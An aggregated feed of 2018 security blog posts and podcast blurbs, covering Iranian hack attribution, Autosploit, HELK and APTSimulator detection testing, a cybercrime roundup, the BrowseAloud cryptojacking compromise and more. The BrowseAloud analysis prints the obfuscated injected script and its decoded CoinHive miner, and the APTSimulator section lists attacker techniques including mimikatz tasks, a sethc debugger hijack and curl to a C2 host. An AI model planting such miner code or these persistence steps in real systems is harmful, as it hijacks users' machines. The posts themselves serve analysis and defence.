Although the official Islamic Republic News Agency says the source of the attack was "the United Kingdom and the United States", that accusation is not entirely clear after reviewing the report from the CERT.  The IP address 93.155.130.14 is listed by the Iranian CERT as being a UK based company using AS47453.  Several sources, including Iranian site fa.alalam.ir, point out that this is actually a Bulgarian IP address.  AS47453 belongs to "itservice.gb-net" with support details listed in Pleven, Bulgaria.

93.155.130.14 - mislabeled in the original CERTCC.ir report
This error of IP address does seem to have been human error, rather than deception, and the CERT has released an updated version of the Iranian news site hacking report which can be found here, showing the corrected information.

The Corrected version of the report ... (created Feb 12 0408AM)

The CERT report is rather uncomplimentary of the hackers, mentioning that there seem to be several clumsy failed reports to dump a list of userids and passwords from the Content Management System database via SQL Injection attacks, as well as several other automated attacks.  In the end, however, the measure of a hacker is in many ways SUCCESS, and it does seem that the objective, shaming the Ayatollah by declaring his death on the eve of the Islamic Revolution holiday, was achieved.

While a source IP address cannot serve exclusively to provide attack attribution, Newsweek reports that on the day the attack began (Thursday, February 8, 2018), that Ayatollah Ali Khamenei gave a speech to commanders of the Iranian Air Force in which he claimed that the United States had created the Islamic State militant group and that the USA is responsible for all the death and destruction ISIS has caused.  That could certainly serve as a motive for certain actors, although the holiday itself, called by American politicians "Death to America Day" included as usual occasional American, Israeli, and British flags burning, as well as several instances of Donald Trump efigees being burned, overall the protests seemed more timid than in the past.

from: http://www.newsweek.com/iran-says-us-even-worse-isis-bombing-supreme-leader-allies-syria-802257 





IDG Contributor Network: How to ensure that giving notice doesn’t mean losing data

Most IT teams invest resources to ensure data security when onboarding new employees. You probably have a checklist that covers network access and permissions, access to data repositories, security policy acknowledgement, and maybe even security awareness education. But how robust is your offboarding security checklist? If you’re just collecting a badge and disabling network and email access on the employee’s last day, you’re not doing enough to protect your data.

Glassdoor reported recently that 35% of hiring decision makers expect more employees to quit in 2018 compared to last year. Whether through malicious intent or negligence, when insiders leave, there’s a risk of data leaving with them. To ensure data security, you need to develop and implement a robust offboarding process.

To read this article in full, please click here

This Is An Emergency – Business Security Weekly #73

This week, Michael and Paul interview Dawn-Marie Hutchinson, Executive Director of Optiv Offline! In the Article Discussion, security concern pushing IT to channel services, what drives sales growth and repeat business, and in the news, we have updates from Proofpoint, J2 Global, LogMeIn, and more on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode73

 

Visit https://www.securityweekly.com/ssw for all the latest episodes!

Autosploit: A Marriage Made for DDoS Botnets

On January 30, 2018 a new mass exploitation tool called “Autosploit” was released on Github, a Git repository hosting service. Autosploit leverages Python code to automatically search for vulnerable devices connected to the Internet and then uses Metasploit’s collection of exploits to take over computers and IoT devices. It automatically trolls the Internet for vulnerable devices which can be leveraged for DDoS attacks. Autosploit is not new code, per se, because it is a combination of the previously existing Shodan and Metasploit modules, which have been used for penetration testing. However, this “marriage” of code makes it easier than ever for hackers to recruit new devices to their own botnet that could be used to mine cryptocurrencies, hack Internet applications or launch distributed denial of service (DDoS) attacks.

Autosploit enables both skilled cybercriminals and amateurs who lack technical expertise (also known as “script kiddies”) to form massive DDoS botnets, thus expanding the pool of potential hackers. As a result, many security experts predict an increase in the number of DDoS attacks and other cyber incidents.

A significant motivation behind DDoS attacks is for financial gain, via extortion and ransom threats. These new, evolving malware-as-a-service tools and techniques, is the signal that the gates are down and companies are faced with being attacked continuously. These forms of malware provide unending opportunities for cybercriminals to hijack vulnerable devices and subsequently launch attacks against online organizations with ease.

It is imperative for organizations to implement a next generation, Internet gateway that includes a best of breed DDoS layer of security to immediately detect and mitigate DDoS attacks. Without this DDoS mitigation layer, companies who are hit with a DDoS attack could face significant loss of revenues and reputation due to outages.

For more information, contact us.

Jim Carrey Hacked My Facebook – Application Security Weekly #05

This week, Keith and Paul continue to discuss OWASP Application Security Verification Standard! In the news, Cisco investigation reveals ASA vulnerability is worse than originally thought, Google Chrome HTTPS certificate apocalypse, Intel made smart glasses that look normal, and more on this episode of Application Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode05

 

Visit https://www.securityweekly.com/ for all the latest episodes!

IDG Contributor Network: 7 ways to stay safe online on Valentine’s Day

Valentine’s Day brings out the softer side in all of us and often plays on our quest for love and appreciation. Online scammers know that consumers are more open to accepting cards, gifts and invitations all in the name of the holiday. While our guards are down, here are a few tips for safeguarding yourself while on your quest to find love on the Internet.

1. Darker side of dating websites

Unfortunately, dating websites — and modern dating apps — are a hunting ground for hackers. There is a peak of online dating activity between New Year’s and Valentine’s Day and cybercriminals are ready to take advantage of the the increased action on popular dating websites like Tinder, OKCupid, Plenty of Fish, Match.com and many others. Rogue adverts and rogue profiles are two of the biggest offenders. For example, many are skeptical of unsolicited advertisements via email. Therefore, spammers have moved to popular websites, including dating and adult sites, to post rogue ads and links. In August 2015, Malwarebytes detected malvertising attacks on PlentyOfFish, which draws more than three million daily users. Just a few months later, the U.K. version of online dating website Match.com was also caught serving up malvertising.

To read this article in full, please click here

Firestarter: Old School and False Analogies

Posted under:

Old School and False Analogies

This week we skip over our series on cloud fundamentals to go back to the Firestarter basics. We start with a discussion of the week’s big acquisition (like BIG considering the multiple). Then we talk about the hyperbole around the release of the iBoot code from an old version of iOS. We also discuss Apple, cyberinsurance, and the actuarial tables. Then we finish up with Rich blabbing about lessons learned as he works on his paramedic again and what parallels to bring to security. For more on that you can read these posts: https://securosis.com/blog/this-security-shits-hard-and-it-aint-gonna-get-any-easier and https://securosis.com/blog/best-practices-unintended-consequences-negative-outcomes

Watch or listen:


- Rich (0) Comments Subscribe to our daily email digest

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our toolsmith theme this month and next. Man, am I having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is the s**t, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the The Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. This...is...Death Battle!

Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not undervalue these two offerings.
HELK is incredibly easy to install. Its also well documented, with lots of related reading material, let me propose that you take the tine to to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
  • git clone https://github.com/Cyb3rWard0g/HELK.git
  • cd HELK/
  • sudo ./helk_install.sh 
Of the three installation options I was presented with, pulling the latest HELK Docker Image from cyb3rward0g dockerhub, building the HELK image from a local Dockerfile, or installing the HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you, if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case http://192.168.248.29.
For my test Windows system I created a Windows 7 x86 virtual machine with Virtualbox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important, is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["192.168.248.29:9092","192.168.248.29:9093","192.168.248.29:9094"]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
  • ./winlogbeat -c winlogbeat.yml -e
  • ./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.

Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  1. Creating typical attacker working directory C:\TMP...
  2. Activating guest user account
    1. Adding the guest user to the local administrators group
  3. Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  4. Modifying the hosts file
    1. Adding update.microsoft.com mapping to private IP address
  5. Using curl to access well-known C2 addresses
    1. C2: msupdater.com
  6. Dropping a Powershell netcat alternative into the APT dir
  7. Executes nbtscan on the local network
  8. Dropping a modified PsExec into the APT dir
  9. Registering mimikatz in At job
  10. Registering a malicious RUN key
  11. Registering mimikatz in scheduled task
  12. Registering cmd.exe as debugger for sethc.exe
  13. Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7 Zip for your system architecture. I'm assuming the default bits are 64bit, I was testing on a 32bit VM.

Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.

Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.

Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.

Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline, process.name, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.

Figure 6. tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).

Figure 7: Timelion
Finally, for this month, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. Not good enough to be particularly useful I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).

Figure 8: Powerful visualization capabilities
This has been such a pleasure this month, I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto consider HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advance Solutions as well, there's more than one way to emulate an adversary.
Next month Part 2 will explore the Network side of the equation via the Network Dashboard and related visualizations, as well as HELK integration with Spark, Graphframes & Jupyter notebooks.
Aw snap, more goodness to come, I can't wait.
Cheers...until next time.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

2018-02-10_ITT.pngFor starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


2018-02-10_ITTGroups

Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

2018-02-10_ITTNew

Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresA federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.

 

Trust Me, I am a Screen Reader, not a CryptoMiner

Until late Sunday afternoon, a number of public sector websites including ICO, NHS, and local councils (for example, Camden in London) have been serving a crypto miner unbeknownst to visitors, turning them into a free computing cloud at the service of unknown hackers. Although initially only UK sites were particularly affected, subsequent reports included Ireland and US websites as well.

BrowseAloud

Figure 1: BrowseAloud accessibility tool.

While initially researchers considered the possibility of a new vulnerability exploited at large, Scott Helme (https://twitter.com/Scott_Helme/status/962691297239846914) quickly identified the culprit in a foreign JavaScript fragment added to the BrowseAloud (see Figure 1) JavaScript file (https://wwwbrowsealoud[.]com/plus/scripts/ba.js), an accessibility tool used by all the affected websites:

\x3c\x73\x63\x72\x69\x70\x74\x3e 
\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72
\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a 
\x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x
61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a
\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d 
\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 
\x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59
\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c 
\x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c
\x2f\x73\x63\x72\x69\x70\x74\x3e

Compromising a third-party tool JavaScript is no small feat, and it allowed deployment of the code fragment on thousands of unaware websites (here a comprehensive list of websites using BrowseAloud to provide screen reader support and text translation services: https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/).

To analyze the obfuscated code we loaded one of the affected websites (Camden Council) into our instrumented web browser (Figure 2) and extracted the clear text.

Figure 2: the web site Camden Council as analyzed by Lastline instrumented web browser.

As it turns out, it is an instance of the well-known and infamous CoinHive, mining the Monero cryptocurrency:

<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: 
Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = 
{threads: 8,throttle:0.6}} var miner = new 
CoinHive.Anonymous('1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq', 
cpuConfig);miner.start();</script>

Unlike Bitcoin wallet addresses, CoinHive site keys do not allow balance checks, making impossible to answer the question of how much money the attackers managed to make in this heist. On the other hand, quite interestingly, the very same CoinHive key did pop up on Twitter approximately one week ago (https://twitter.com/Banbreach/status/960594618499858432); context on this is still not clear, and we will update the blog post as we know more.

As of now (16:34) the company behind BrowseAloud, Texthelp, removed the JavaScript from their servers (as a preventive measure the browsealoud[.]com domain has also been set to resolve to NXDOMAIN) effectively putting a stop to this emergency by disabling the BrowseAloud tool altogether. But when did it start, and most importantly how did it happen?

Figure 3: S3 object metadata.

Marco Cova one of our senior researchers here at Lastline, quickly noticed that the BrowseAloud JavaScript files were hosted on an S3 bucket (see Figure 3 above).

In particular the last modified time of the ba.js resource showed 2018-02-11T11:14:24 making this Sunday morning UK time the very first moment this specific version of the JavaScript had been served.

Figure 4: S3 object permissions.

Although it’s not possible to know for certain (only our colleagues at Texthelp can perform this investigation) it seems possible that attackers may have managed to modify the object referencing the JavaScript file by taking advantage of weak S3 permissions (see Figure 4). Unfortunately we cannot pinpoint the exact cause as we do not have at our disposal all permissions records for the referenced S3 bucket.

Considering the number of components involved in a website on average, it might be concerning to see that a single compromise managed to affect so many websites. As Scott Helme noticed however, we should be aware that technologies able to thwart this kind of attacks exist already: in particular, if those websites had implemented CSP (Content Security Policy) to mandate the use of SRI (Subresource Integrity), any attempt to load a compromised JavaScript would have failed, sparing thousands of users the irony of mining cryptocurrency for unknown hackers, while looking to pay their council tax.

The post Trust Me, I am a Screen Reader, not a CryptoMiner appeared first on Lastline.

Tips to improve IoT security on your network

Judging by all the media attention that The Internet of Things (or IoT) gets these days, you would think that the world was firmly in the grip of a physical and digital transformation. The truth, though, is that we all are still in the early days of the IoT.

The analyst firm Gartner, for example, puts the number of Internet connected “things” at just 8.4 billion in 2017 – counting both consumer and business applications. That’s a big number, yes, but much smaller number than the “50 billion devices” or “hundreds of billions of devices” figures that get bandied about in the press.

To read this article in full, please click here

(Insider Story)

Walk The Plank – Paul’s Security Weekly #547

This week, Zane Lackey of Signal Sciences joins us for an interview! Our very own Larry Pesce delivers the Technical Segment on an intro to the ESP8266 SoC! In the news, we have updates from Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/Episode547

 

Visit https://www.securityweekly.com/psw for all the latest episodes!

Pundits Speculate: Did Russian Hackers Launch DDoS Attacks on Dutch Organizations?

Hackers who launch distributed denial of service (DDoS) attacks have varying motives, such as 1) competitive advantage against a business adversary, 2) vandalism for the sake of creating chaos/misfortune, 3) data theft, 4) political hacktivism or 5) cyber espionage. Earlier this week three Dutch banks and the Dutch Taxation Authority were victimized by DDoS attacks, starting on January 30. One security researcher claimed the attacks registered 40 Gbps. That’s not a massive volumetric attack, but it would be enough to disable a website. It’s more alarming when an attack impacts a bank or a government agency, because both types of organizations possess millions of sensitive data records.

The Dutch national tax office said its website went offline briefly, for 5-10 minutes. Regardless of how long they were under DDoS attack, those afflicted Dutch organizations should also be concerned about a security breach, because while a network is compromised hackers can infect it with malware that may “sleep” for weeks or months, only to be resurrected remotely by the hackers. Even a short-duration DDoS attack is sufficient to install malware. That’s partly what makes DDoS attacks so pernicious; alone they do not constitute a security breach, but they are often done as a precursor to a breach. With the new EU GDPR regulations going into effect at the end of May, those Dutch organizations had better take a close look at their IT security systems.

DDoS Assessment

Some Dutch pundits (apparently off the record) surmise that Russian hackers launched the attacks as an act of political revenge for news reports that exposed the work of Russian state-sponsored hackers. According to BleepingComputer.com, “Last week, Dutch newspaper Volkskrant and TV station NOS published a report claiming that the country's AIVD intelligence service compromised the computer of a hacker part of Russian-based cyber-espionage group Cozy Bear (also known as APT29). The report claim AIVD agents spied on the cyber-espionage unit since 2014 and observed how Russian intelligence services hacked into DNC servers during the 2016 US Presidential election.”

These days it’s possible that anyone—not just some Russian hackers—could have launched the DDoS attacks because there is an abundance of botnet code out on the Dark Web. The hackers could be state-sponsored, or not. The Dutch authorities will probably never know for certain the source of the DDoS attacks, since such attacks are notoriously difficult to trace.

This incident is just one of many that point to the need to implement a DDoS defense solution at the network edge. Corero has been a leader in DDoS protection solutions for over a decade. To learn how we can help protect your part of the Internet ecosystem, contact us.

Dark Side Ops I & 2 Review

Dark Side Ops I
https://silentbreaksecurity.com/training/dark-side-ops/
https://www.blackhat.com/us-17/training/dark-side-ops-custom-penetration-testing.html 

 A really good overview of the class is here https://www.ethicalhacker.net/features/root/course-review-dark-side-ops-custom-penetration-testing

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-)

 I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the  implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn’t enough setup around the “how” to consistently do it either unless you have a strong windows API background. However, one of the labs consisted of adding load and run powershell functionality which allows you to make use of the plethora of powershell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The visual studio piece can get overwhelming but it definitely gives you a big taste of (Windows) implant development.  The class material are getting slightly dated in some cases.  A refresh might be helpful.  More Throwback usage & development would be fun (even as optional labs).


DSO II
https://silentbreaksecurity.com/training/dark-side-ops-2-adversary-simulation/ 
https://www.blackhat.com/us-17/training/dark-side-ops-ii-adversary-simulation.html 

Lab one was getting a fresh copy of slingshot back up and running and then setting up some additional code to do a powershell web cradle to get our slingshot implant up and running on a remote host. Similar to how metasploit web delivery does things.



Lab 2 was doing some devops to set up servers, OpenVPN to tunnel traffic, and adding HTTPS to our slingshot codebase.

Lab 3 was some Initial activity labs (HTA and chrome plugin exploitation)





Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasions as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or  just for people doing response.

Lab 5 whitelist bypassing

Lab 6 was doing some profiling via powershell and using slingshot to be able to do checks on the host

Labs 7-9 building a kernel rootkit



Lab 10 persistence via COM Hijacking and hiding our custom DLL in the registry and Lab 11 was privilege escalation via custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

Criticisms:
I think the set of courses are having a bit of an identity crisis mostly due to the 2 day
format and would be a much better class as a 5 day.  It is heavy development focused meaning you
spend a lot of time in Visual Studio tweaking C code. The “operations” piece  of the course definitely
suffers a bit due to all the dev time. There was minimal talk around lateral movement and the whole
thing is entirely Windows focused so no Linux and no OSX.  A suggestion to fix the “ops” piece
would be to have a Dark Side Ops - Dev and Dark Side Ops - Operator courses where the dev one
is solely deving your implant and the Operator course would be solely using the implant you dev’d
(or was provided to you).  The Silent Break team definitely knows their stuff and a longer class
format or switch up would allow them to showcase that more efficiently.




GDPR Material and Territorial Scopes

The new EU General Data Regulation will enter into force 25 May of this year. The GDPR contains rules concerning the protection of natural persons when their personal data are processed and rules on the free movement of personal data. The new regulation is not revolutionary but an evolution from the previous Data Protection Act 1998 […]

GDPR Preparation: Recent Articles of Note

Company preparations for GDPR compliance are (or should be!) in full swing with the 25th May enforcement date fast looming on the horizon. With that in mind, I found the following set of recent GDPR articles a decent and interesting read. The list was compiled by Brian Pennington of Coalfire, he has kindly allowed me to repost.

If you are after further GDPR swatting up, you could always read the actual regulation EU General Data Protection Regulation (EU-GDPR), and don't forget to read all the Recitilies.

If you have any offer GDPR related articles or blogs of note, please post in the comments.

A secure web is here to stay


For the past several years, we’ve moved toward a more secure web by strongly advocating that sites adopt HTTPS encryption. And within the last year, we’ve also helped users understand that HTTP sites are not secure by gradually marking a larger subset of HTTP pages as “not secure”. Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as “not secure”.

In Chrome 68, the omnibox will display “Not secure” for all HTTP pages.


Developers have been transitioning their sites to HTTPS and making the web safer for everyone. Progress last year was incredible, and it’s continued since then:

  • Over 68% of Chrome traffic on both Android and Windows is now protected
  • Over 78% of Chrome traffic on both Chrome OS and Mac is now protected
  • 81 of the top 100 sites on the web use HTTPS by default
Chrome is dedicated to making it as easy as possible to set up HTTPS. Mixed content audits are now available to help developers migrate their sites to HTTPS in the latest Node CLI version of Lighthouse, an automated tool for improving web pages. The new audit in Lighthouse helps developers find which resources a site loads using HTTP, and which of those are ready to be upgraded to HTTPS simply by changing the subresource reference to the HTTPS version.

Lighthouse is an automated developer tool for improving web pages.

Chrome’s new interface will help users understand that all HTTP sites are not secure, and continue to move the web towards a secure HTTPS web by default. HTTPS is easier and cheaper than ever before, and it unlocks both performance improvements and powerful new features that are too sensitive for HTTP. Developers, check out our set-up guides to get started.

Remembering John Perry Barlow, co-founder of Freedom of the Press Foundation and Internet pioneer. 1947-2018

Barlow
Parker Higgins

We lost a legend yesterday. John Perry Barlow, co-founder of Freedom of the Press Foundation (FPF) and our original guiding voice, has passed away at the age of 70.

Over the course of an indelible and truly original life, Barlow was many things to many people. Some met him as a Wyoming cattle rancher, or as a mainstay in Timothy Leary’s Millbrook psychedelic facility, but many came to know him as the lyricist and poet responsible for “Cassidy” and other classic Grateful Dead tunes. It was that community—Grateful Dead fans who started some of the first message boards—that brought Barlow to the Internet, where the clarity of his vision and strength of his ideals made him a pioneer, and his gift with language made him the de facto poet laureate of a generation of technologists.

His most famous essay, a Declaration of the Independence of Cyberspace (“Governments of the Industrial World, you weary giants of flesh and steel…”) was a catalyst for the Internet freedom movement and is taught in universities and law schools around the country. Years before Napster and its ilk would force the music industry into a reckoning, his Wired writing on copyright became a blueprint for how less restrictive—and fairer—intellectual property rules could form a cornerstone of a new economy of ideas. He was a friend and advisor to basically every early Internet pioneer, entrepreneur, or activist you can name.

He was clearly a man of words, and he was also a man of action. In 1990, well before the reach of the Web would bring the Internet into everyday life, he understood its potential as a liberating force—as well as the risk that it could recapitulate existing power structures that had always pushed some people to the margins. In that year, he co-founded the Electronic Frontier Foundation, which has remained for a generation on the forefront of the struggle to ensure technology lives up to its potential of expanding humanity’s access to civil liberties, instead of curtailing them.

It was his passion for press freedom, and his belief that whistleblowers should be protected, not punished, which spurred him to co-found Freedom of the Press Foundation in 2012. He eloquently wrote at the time, “When a government becomes invisible, it becomes unaccountable. To expose its lies, errors, and illegal acts is not treason, it is a moral responsibility. Leaks become the lifeblood of the Republic.”

Here he is with our other co-founder Daniel Ellsberg, the day after we launched Freedom of the Press Foundation:

